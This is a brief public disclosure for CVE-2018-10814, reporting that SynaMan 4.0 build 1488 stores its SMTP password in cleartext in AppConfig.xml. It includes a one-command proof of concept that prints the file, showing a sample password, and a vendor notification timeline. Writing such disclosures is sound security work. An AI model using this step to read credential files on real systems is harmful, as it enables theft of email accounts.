SynaMan 40 Build 1488 SMTP Credential Disclosure

SynaMan version 4.0 build 1488 suffers from an SMTP credential disclosure vulnerability.

MD5 | 355d3631ea9f1a7c3b9b33a27d88b656

# Exploit Author: bzyo
# CVE: CVE-2018-10814
# Twitter: @bzyo_
# Exploit Title: SynaMan 4.0 - Cleartext password SMTP settings
# Date: 09-12-18
# Vulnerable Software: SynaMan 4.0 build 1488
# Vendor Homepage:
# Version: 4.0 build 1488
# Software Link:
# Tested On: Windows 7 x86

SynaMan 4.0 suffers from cleartext password storage for SMTP settings which would allow email account compromise

Access to a system running Synaman 4 using a low-privileged user account

Proof of Concept
The password for the smtp email account is stored in plaintext in the AppConfig.xml configuration file. This file can be viewed by any local user of the system.

C:\SynaMan\config>type AppConfig.xml
<?xml version="1.0" encoding="UTF-8"?>
<parameter name="hasLoggedInOnce" type="4" value="true"></parameter>
<parameter name="adminEmail" type="1" value="[email protected]"></parameter>
<parameter name="smtpSecurity" type="1" value="None"></parameter>
<parameter name="smtpPassword" type="1" value="SuperSecret!"></parameter>
<parameter name="ntServiceCommand" type="1" value="net start SynaMan"></parameter>
<parameter name="mimicHtmlFiles" type="4" value="false"></parameter>

05-07-18: Vendor notified of vulnerabilities
05-08-18: Vendor responded and will fix
07-25-18: Vendor fixed in new release
09-12-18: Submitted public disclosure

Related Posts